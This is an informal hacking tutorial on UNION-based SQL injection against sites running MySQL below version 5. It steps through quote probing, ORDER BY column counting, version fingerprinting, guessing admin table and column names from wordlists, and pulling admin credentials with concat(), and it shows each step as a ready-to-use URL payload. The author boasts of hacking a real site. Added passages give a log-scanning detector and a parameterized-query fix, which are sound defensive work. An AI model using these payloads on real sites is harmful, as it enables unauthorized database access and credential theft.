How To Hack Sites That Have Lower MySQL Version Than 5
I'll make it easy and fast, simple and with less theory.
What Will You Read About:
*Check For Vuln.
*Check How Many Columns Are There
*Check Whether Union Works
*Check For Version
*Getting table and column name & Pulling Data Out.
Okay, letz start...
We are going to use an example like this:
*Check For Vuln.
Checking for vuln is the same as in normal SQL injection, with a quote character ('), so the URL will look like this:
and we will get something like
This means that the site is vuln to MySQL injection.
*Check How Many Columns Are There
Like I said, as in normal MySQL injection, we do this with
So we go now to the URL and try to find how many columns there are:
We got some message like
This means that there are 3 columns.
*Check Whether Union Works
With union we can select more data in one SQL statement.
If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works.
*Check For Version
So when we typed this:
some number, let's say 2, showed up on the screen. Now we change 2 into
so the URL will look like this:
and we get a result something like this:
*Getting table and column name
And now is the real part where you learn about how to do this shit.
Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) we need to guess the table names and column names. So this is the hard part in this injection.
-Why?
Well, not every site is in the English language. I have recently hacked a site from Belgium; the columns and tables weren't like
they were completely different, so this makes the injector (you/hacker) work a lot harder: you need to search for that kind of words, then translate them, a lotz a lotz of work, and maybe everything will be for nothing. That is why I hate this injection.
So letz say the site has English table names and column names.
common table names:
common column names:
Now letz check if there is a table named admin. We do that by doing this:
So if we see the number 2 on the screen, the table admin exists; if it doesn't exist, we will probably get an error.
So we move on. We know there is a table named admin; now it's time for the columns.
If we get an error, the column name "username" doesn't exist,
so we try another:
It returns data, e.g.:
So we guessed the user column; now it's time for the password:
Damn, it returns an error; there is no column named "password". Let's try another:
w00t, we got:
So now we know that there is a table named:
with columns:
and we pulled the data from them and got:
Also we can use concat() to get everything in one request:
and we get:
Well, that was it: how to hack a site with MySQL injection lower than 5. Hope you like it, guys.
We are going to use an example like this:
Code:
http://site.com/news.php?id=5
Checking for vuln is the same as in normal SQL injection, with a quote character ('), so the URL will look like this:
Code:
http://site.com/news.php?id=5'
Code:
"You have an error in your SQL syntax; check the manual that
corresponds to your MySQL server version for the right
*Check How Many Columns Are There
Like I said, as in normal MySQL injection, we do this with
Code:
Order By
Code:
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error
Code:
Unknown Column "4" in "order clause"
*Check Whether Union Works
With union we can select more data in one SQL statement.
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
*Check For Version
So when we typed this:
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3/*
Code:
version() or @@version
Code:
http://www.site.com/news.php?id=5 union select 1,@@version,3/*
Code:
4.1.33-log or 5.0.45 or similar.
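The probing steps above (quote, ORDER BY, UNION, version) leave a recognisable sequence in web server access logs. As an added example that is not part of the original tutorial, the Python below classifies each request by stage and flags clients that show two or more stages; the log lines, IP addresses and function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Signatures for the probing stages described above, most specific first.
STAGES = [
    ("version_fingerprint",
     re.compile(r"union\s+(?:all\s+)?select\b.*(?:@@version|version\s*\()", re.I)),
    ("table_guess", re.compile(r"union\s+(?:all\s+)?select\b.*\bfrom\s+\w+", re.I)),
    ("union_probe", re.compile(r"union\s+(?:all\s+)?select\b", re.I)),
    ("column_count", re.compile(r"\border\s+by\s+\d+", re.I)),
    ("quote_probe", re.compile(r"=[^&\s]*'")),
]
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "GET /news.php?id=5' HTTP/1.1" 200 512
203.0.113.7 - - [10/Oct/2023:13:55:09 +0000] "GET /news.php?id=5%20order%20by%204/* HTTP/1.1" 200 498
203.0.113.7 - - [10/Oct/2023:13:55:20 +0000] "GET /news.php?id=5+union+all+select+1,2,3/* HTTP/1.1" 200 530
203.0.113.7 - - [10/Oct/2023:13:55:31 +0000] "GET /news.php?id=5+union+select+1,@@version,3/* HTTP/1.1" 200 530
203.0.113.7 - - [10/Oct/2023:13:55:44 +0000] "GET /news.php?id=5+union+all+select+1,2,3+from+admin/* HTTP/1.1" 200 530
198.51.100.20 - - [10/Oct/2023:13:56:02 +0000] "GET /news.php?id=5 HTTP/1.1" 200 2048
198.51.100.20 - - [10/Oct/2023:13:56:10 +0000] "GET /search.php?q=o'brien HTTP/1.1" 200 2048
"""

def classify(query):
    """Return the stage name matched by a URL-decoded query string, or None."""
    decoded = unquote_plus(query)
    for name, pattern in STAGES:
        if pattern.search(decoded):
            return name
    return None

def scan(log_text, min_stages=2):
    """Map client IP -> ordered distinct stages, for clients showing >= min_stages."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m or "?" not in m.group(2):
            continue
        stage = classify(m.group(2).split("?", 1)[1])
        if stage and stage not in seen[m.group(1)]:
            seen[m.group(1)].append(stage)
    return {ip: stages for ip, stages in seen.items() if len(stages) >= min_stages}

if __name__ == "__main__":
    for ip, stages in scan(SAMPLE_LOG).items():
        print(ip, " -> ".join(stages))
```

A single quote on its own (the `o'brien` search) matches only one stage, so requiring several distinct stages per client keeps ordinary traffic out of the alert.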
And now is the real part where you learn about how to do this shit.
Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...) we need to guess the table names and column names. So this is the hard part in this injection.
-Why?
Well, not every site is in the English language. I have recently hacked a site from Belgium; the columns and tables weren't like
Code:
username,user,userid,password,members,admin etc.
So letz say the site has English table names and column names.
common table names:
Code:
user,users,admin,administrators,members,member,login
Code:
username,useremail,n_user,user_name,user,password,pass,upass,userpassword,userpass,hash,email,umail
Code:
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
So we move on. We know there is a table named admin; now it's time for the columns.
Code:
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/*
so we try other:
Code:
http://www.site.com/news.php?id=5 union all select 1,uname,3 from admin/*
Code:
Administrator
Code:
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/*
Code:
http://www.site.com/news.php?id=5 union all select 1,upass,3 from admin/*
Code:
AdminPassword
Code:
admin
Code:
uname and upass
Code:
Administrator:AdminPassword
Code:
http://www.site.com/news.php?id=5 union all select 1,concat(uname,0x3a,upass),3 from admin/*
Code:
Administrator:AdminPassword
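Every step above depends on the `id` value being pasted into the SQL text. As an added example that is not from the original tutorial, the Python below sets that pattern beside input validation plus a bound parameter; it uses `sqlite3` as a stand-in for the PHP/MySQL site, and the schema, rows and function names are assumptions.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the site's database (constructed schema and rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER, title TEXT, body TEXT)")
    db.execute("CREATE TABLE admin (uname TEXT, upass TEXT)")
    db.execute("INSERT INTO news VALUES (5, 'Release notes', 'Body text')")
    db.execute("INSERT INTO admin VALUES ('constructed-user', 'constructed-secret')")
    return db

def news_concatenated(db, raw_id):
    """'Before' form: the request value becomes part of the SQL text."""
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return db.execute(sql).fetchall()

def news_bound(db, raw_id):
    """Hardened form: accept only a short decimal id, then bind it as data."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []  # caller should answer with a generic error, never SQL error text
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Request value from the tutorial's column-guessing step (comment suffix dropped).
TUTORIAL_VALUE = "5 union all select 1,uname,3 from admin"

if __name__ == "__main__":
    db = make_db()
    print(news_concatenated(db, TUTORIAL_VALUE))  # second row comes from admin
    print(news_bound(db, TUTORIAL_VALUE))         # rejected before reaching SQL
    print(news_bound(db, "5"))                    # normal lookup still works
```

Returning a generic error instead of the database message also removes the feedback that the quote, ORDER BY and guessing steps rely on.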